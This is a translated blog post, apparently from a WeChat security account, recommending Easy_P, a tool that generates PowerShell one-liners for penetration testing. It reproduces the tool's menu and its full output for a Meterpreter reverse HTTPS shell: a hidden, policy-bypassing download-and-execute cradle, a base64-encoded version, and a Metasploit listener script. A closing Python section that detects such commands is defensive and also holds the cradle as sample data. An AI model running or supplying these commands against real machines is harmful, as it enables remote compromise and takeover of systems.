Tool recommendation: Easy_P, a helper that generates commonly used PowerShell code

Category: Security Tools

PowerShell is powerful, and not only for system administration. In day-to-day penetration testing we often need PowerShell scripts to get the job done, for instance to work around firewalls, and for anyone unfamiliar with PowerShell scripting that is a real hurdle. Fortunately someone has already thought of this and written a helper Python script that automatically generates the commonly used PowerShell one-liners.

Easy_P GitHub address: https://github.com/cheetz/Easy-P.git

First, the project's own description:

Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the user's needs.

      PowerShell/WMI Generator
=========================================================
___________                              __________
_   _____/____    _________.__.         ______   
  |    __)___    /  ___<   |  |  ______  |     ___/
  |        / __ ____ ___  | /_____/  |    |    
 /_______  (____  /____  >/ ____|          |____|    
         /     /     / /                         
Easy_P | A Powershell / WMI Command Generator.
Written by Peter Kim <Author, The Hacker Playbook>
                     <CEO, Secure Planet LLC>
==================================================Easy-P==
-----------------------------------------------------
[1] Privilege Escalation
[2] Lateral Movement
[3] Keylogging
[4] PowerShell Meterpreter
[5] Change Users Execution Policy
[6] Powershell 101
[7] Base64 Encode a PowerShell Script
[8] Mimikatz - Passwords from Memory
[99] Exit/Quit
-----------------------------------------------------

We choose option 4, which generates a reverse-connecting Meterpreter script:

Select An Option: 4
[*]PowerShell Metasploit Meterpreter Reverse HTTPS Shell.  Original: https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
LHOST: 192.168.1.103
LPORT: 55555

[*]Download from internet and execute:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force

[*]Run from a local copy of the script:
powershell.exe -exec bypass -Command "& {Import-Module .Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force}"

[*]Base64 encoded version download and execute:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADEALgAxADAAMwAgAC0ATABwAG8AcgB0ACAANQA1ADQANgAgAC0ARgBvAHIAYwBlAA==

[*]Listner Resource Script (listener.rc) - Save the following to a file called listener.rc on your Kali box and load your handler with msfconsole -r listener.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.103
set LPORT 55555
set ExitOnSession false
exploit -j

As you can see, the tool produces the PowerShell command in three forms: download-and-execute over the network, execution from a local copy of the script, and a base64-encoded version. The remaining menu options are left for readers to explore on their own; for reasons of length they are not covered here.
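The three forms above (plain download cradle, local copy, and the `-enc` base64 version) are also exactly what a defender sees in process-creation or PowerShell logging, and the encoded form only hides the cradle from a naive string match. As an added example that is not part of the original post or of the Easy_P project, the following Python decodes a `-EncodedCommand` argument (base64 of UTF-16LE text) and matches the flags and cradle fragments shown above against both the visible command line and the decoded payload; the sample command lines, the 192.0.2.10 host and the example.invalid URL are constructed for the demonstration.

```python
import base64
import binascii
import re
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the lookahead excludes -exec/-executionpolicy and -ep, which also start with "-e".
ENC_FLAG = re.compile(r"(?:^|\s)-e(?!x|p)[a-z]*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicators taken from the three invocation forms shown above: (name, regex).
INDICATORS = [
    ("download_cradle", r"Net\.WebClient\)\.DownloadString"),
    ("invoke_expression", r"(?:^|[\s;(])(?:IEX|Invoke-Expression)\b"),
    ("hidden_window", r"-W(?:indowStyle)?\s+Hidden"),
    ("policy_bypass", r"-Exec(?:utionPolicy)?\s+Bypass"),
    ("no_profile_noninteractive", r"-NoP\b.*-NonI\b"),
    ("invoke_shellcode", r"Invoke-Shellcode\b"),
    ("encoded_command", r"(?:^|\s)-e(?!x|p)[a-z]*\s+[A-Za-z0-9+/=]{16,}"),
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline):
    """Match indicators against the visible command line plus any decoded -enc
    payload. Returns (decoded_payload_or_None, [matched indicator names])."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, pat in INDICATORS if re.search(pat, haystack, re.IGNORECASE)]
    return decoded, hits

def encode_command(script):
    """Build an -enc argument the way PowerShell expects it; used here only to
    construct the sample, so the round trip through the decoder is exact."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed samples (not real logs): the plain cradle as the tool prints it,
# the same script in -enc form, and a benign administrative call that must not fire.
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/"
                 "Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/"
                 "reverse_https -Lhost 192.0.2.10 -Lport 55555 -Force")
SAMPLE_PLAIN = "Powershell.exe -NoP -NonI -W Hidden -Exec Bypass " + SAMPLE_SCRIPT
SAMPLE_ENCODED = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + encode_command(SAMPLE_SCRIPT)
SAMPLE_BENIGN = "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"
```

Running `analyze_command_line` over the three samples flags the plain and encoded forms on the same indicators (the encoded one additionally on `encoded_command`) and leaves the benign invocation untouched.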

This article was first published on the WeChat public account (milsec): Tool recommendation: Easy_P, a helper that generates commonly used PowerShell code
